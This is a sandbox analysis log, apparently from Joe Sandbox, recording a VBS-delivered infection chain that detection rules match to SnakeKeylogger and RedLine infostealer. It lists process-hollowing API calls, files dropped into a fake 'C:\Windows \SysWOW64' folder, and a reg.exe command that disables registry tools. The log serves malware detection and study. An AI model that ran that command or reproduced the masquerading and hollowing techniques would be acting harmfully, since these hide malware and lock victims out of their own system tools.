            Source: 0000000B.00000002.3116343465.000000002A956000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 0000000B.00000002.3118421537.000000002BD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 00000011.00000002.3109591892.000000001C560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 00000011.00000002.3109192607.000000001C136000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 0000000B.00000003.1986218044.0000000028CFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 00000006.00000002.3110746880.000000001E421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 00000011.00000002.3111207326.000000001D7F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 0000000B.00000002.3089643523.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 00000006.00000003.1856725712.000000001B37A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 00000011.00000003.2056284697.000000001A55C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 00000011.00000002.3089641728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 00000006.00000002.3108782055.000000001CFF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 0000000B.00000002.3116923850.000000002AB30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 00000006.00000002.3109265688.000000001D3A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 00000006.00000001.1853843841.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 0000000B.00000001.1965196360.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects RedLine infostealer, Author: ditekSHen
            Source: 00000011.00000002.3110271485.000000001C760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: 00000006.00000002.3111442150.000000001F8A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: Process Memory Space: liuuazhU.pif PID: 1856, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: Process Memory Space: liuuazhU.pif PID: 5640, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: Process Memory Space: liuuazhU.pif PID: 5956, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
            Source: NETUTILS.dll.1.dr, Static PE information: section name: .
            Source: NETUTILS.dll.1.dr, Static PE information: section name: .
            Source: NETUTILS.dll.1.dr, Static PE information: section name: .
            Source: NETUTILS.dll.1.dr, Static PE information: section name: .
            Source: NETUTILS.dll.1.dr, Static PE information: section name: .
            Source: NETUTILS.dll.1.dr, Static PE information: section name: .
            Source: NETUTILS.dll.1.dr, Static PE information: section name: .
            Source: NETUTILS.dll.1.dr, Static PE information: section name: .
            Source: NETUTILS.dll.1.dr, Static PE information: section name: .
            Source: NETUTILS.dll.1.dr, Static PE information: section name: .
            Source: NETUTILS.dll.1.dr, Static PE information: section name: .
            Source: C:\Windows\System32\wscript.exe, COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
            Source: C:\Windows\System32\wscript.exe, COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 1_2_027E82CC NtReadVirtualMemory
            Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 1_2_027EE064 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose
            Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 1_2_027E853C NtUnmapViewOfSection
            Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 1_2_027E7A2C NtAllocateVirtualMemory
            Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 1_2_027EDEF8 Rt,RtlDosPathNameToNtPathName_U,NtDeleteFile
            Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 1_2_027EDF80 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
            Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 1_2_027E8C28 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
            Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 1_2_027E7D78 NtWriteVirtualMemory
            Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 1_2_027E7A2A NtAllocateVirtualMemory
            Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 1_2_027EDEA4 Rt,RtlDosPathNameToNtPathName_U,NtDeleteFile
            Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 1_2_027E8C26 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF, Code function: 16_2_029982CC NtReadVirtualMemory
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF, Code function: 16_2_0299E064 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF, Code function: 16_2_0299853C NtUnmapViewOfSection
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF, Code function: 16_2_02997A2C NtAllocateVirtualMemory
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF, Code function: 16_2_02998C28 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF, Code function: 16_2_02997D78 NtWriteVirtualMemory
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF, Code function: 16_2_029985C8 NtUnmapViewOfSection
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF, Code function: 16_2_02997A2A NtAllocateVirtualMemory
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF, Code function: 16_2_0299DEA4 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF, Code function: 16_2_0299DEF8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF, Code function: 16_2_0299DF80 RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF, Code function: 16_2_02998C26 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread
            Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: 1_2_027E8654 CreateProcessAsUserW
            Source: C:\Users\user\AppData\Local\Temp\x.exe, File created: C:\Windows \SysWOW64\svchost.pif
            Source: C:\Users\user\AppData\Local\Temp\x.exe, File created: C:\Windows \SysWOW64\NETUTILS.dll
            Source: C:\Windows\SysWOW64\cmd.exe, File created: C:\Windows 
            Source: C:\Windows\SysWOW64\cmd.exe, File created: C:\Windows \SysWOW64
            Source: C:\Users\user\AppData\Local\Temp\x.exe, File deleted: C:\Windows \SysWOW64\svchost.pif
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C542011_2_2E4C5420
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CF57011_2_2E4CF570
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C21F811_2_2E4C21F8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C9A6811_2_2E4C9A68
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C4E6011_2_2E4C4E60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CCE2811_2_2E4CCE28
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C822011_2_2E4C8220
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CD69811_2_2E4CD698
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CC29A11_2_2E4CC29A
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CC2A811_2_2E4CC2A8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C76A011_2_2E4C76A0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C936011_2_2E4C9360
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CE37911_2_2E4CE379
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C471811_2_2E4C4718
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CB72811_2_2E4CB728
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C6B2011_2_2E4C6B20
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C87E011_2_2E4C87E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C5F9011_2_2E4C5F90
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CABA811_2_2E4CABA8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C5FA011_2_2E4C5FA0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C7C5011_2_2E4C7C50
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CC86811_2_2E4CC868
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C7C6011_2_2E4C7C60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CA02811_2_2E4CA028
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CBCD811_2_2E4CBCD8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CBCE811_2_2E4CBCE8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C70E011_2_2E4C70E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C48A011_2_2E4C48A0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CB16811_2_2E4CB168
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C656011_2_2E4C6560
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CF56011_2_2E4CF560
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4CA5E811_2_2E4CA5E8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C59E011_2_2E4C59E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E4C8DA011_2_2E4C8DA0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E7C0E1011_2_2E7C0E10
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E7CAFC811_2_2E7CAFC8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E7CDD6011_2_2E7CDD60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E7C072811_2_2E7C0728
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E7CF79111_2_2E7CF791
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E7C004011_2_2E7C0040
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E7CF00111_2_2E7CF001
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E7C20B011_2_2E7C20B0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E7C0E0A11_2_2E7C0E0A
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E7CABDC11_2_2E7CABDC
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E7C072211_2_2E7C0722
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E7C003211_2_2E7C0032
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 11_2_2E824AD111_2_2E824AD1
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 11_1_00408C60
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 11_1_0040DC11
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 11_1_00407C3F
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 11_1_00418CCC
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 11_1_00406CA0
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 11_1_004028B0
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 11_1_0041A4BE
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 11_1_00408C60
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 11_1_00418244
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 11_1_00401650
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 11_1_00402F20
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 11_1_004193C4
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 11_1_00418788
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 11_1_00402F89
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 11_1_00402B90
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 11_1_004073A0
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF, Code function: 16_2_029820C4
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_00408C60
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_0040DC11
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_00407C3F
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_00418CCC
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_00406CA0
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_004028B0
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_0041A4BE
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_00408C60
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_00418244
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_00401650
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_00402F20
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_004193C4
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_00418788
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_00402F89
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_00402B90
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_004073A0
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1C3C15BF
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1C3C15C8
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1C3C0EE0
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1C3C0F20
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F285F38
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F28BB90
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F28B3E0
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F286627
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F281A08
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F28EDD0
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F28CB50
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F28B3D1
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F28AE18
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F28665E
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F28E250
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F28A288
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F2896F8
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F28D6D0
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F285D18
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F28D110
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F28557D
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F285580
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F2819F8
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F28EDC3
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F28E810
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F28A850
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F28DC90
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F289CC0
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F29EBF0
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F29D2E8
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F290007
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1F290040
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE1E388
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE121F8
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE1F570
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE11420
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE187E0
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE15FA0
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE1ABA8
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE15F90
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE19360
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE1E379
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE16B20
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE1B728
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE14718
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE176A0
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE1C2A8
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE1C29B
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE14E60
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE19A68
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE18220
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE1CE28
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE159E0
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE1A5E8
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE18DA0
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE16560
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE1F560
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE1B168
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE170E0
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE1BCE8
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE1BCDB
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE148A0
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE17C60
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE1C868
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE17C50
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE15420
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_1FE1A028
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_20110040
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_201120B0
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_20110728
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_2011DD60
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_20110E10
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_20110033
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_20110723
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_2011ABDC
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_20110E0B
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: 17_2_20264AD1
            Source: Joe Sandbox View, Dropped File: C:\Users\Public\Libraries\liuuazhU.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF, Code function: String function: 029846D4 appears 155 times
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF, Code function: String function: 02998818 appears 50 times
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF, Code function: String function: 02984860 appears 677 times
            Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: String function: 027D44DC appears 74 times
            Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: String function: 027E8818 appears 56 times
            Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: String function: 027E889C appears 45 times
            Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: String function: 027D46D4 appears 244 times
            Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: String function: 027D4860 appears 943 times
            Source: C:\Users\user\AppData\Local\Temp\x.exe, Code function: String function: 027D4500 appears 34 times
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: String function: 0040FB9C appears 40 times
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: String function: 0040D606 appears 96 times
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Code function: String function: 0040E1D8 appears 172 times
            Source: INQUIRY LIST 292.vbs, Initial sample: Strings found which are bigger than 50
            Source: NETUTILS.dll.1.dr, Static PE information: Number of sections : 19 > 10
            Source: C:\Users\Public\Libraries\liuuazhU.pif, Process created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
            Source: 17.2.liuuazhU.pif.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 17.1.liuuazhU.pif.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 6.3.liuuazhU.pif.1b37a088.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.1.liuuazhU.pif.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 11.2.liuuazhU.pif.476068.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 17.1.liuuazhU.pif.43d038.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 11.2.liuuazhU.pif.2aa80f08.6.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.2.liuuazhU.pif.1c560f08.6.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1d3a0f08.5.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.2.liuuazhU.pif.1c17772e.4.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.2.liuuazhU.pif.1d7f5570.8.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
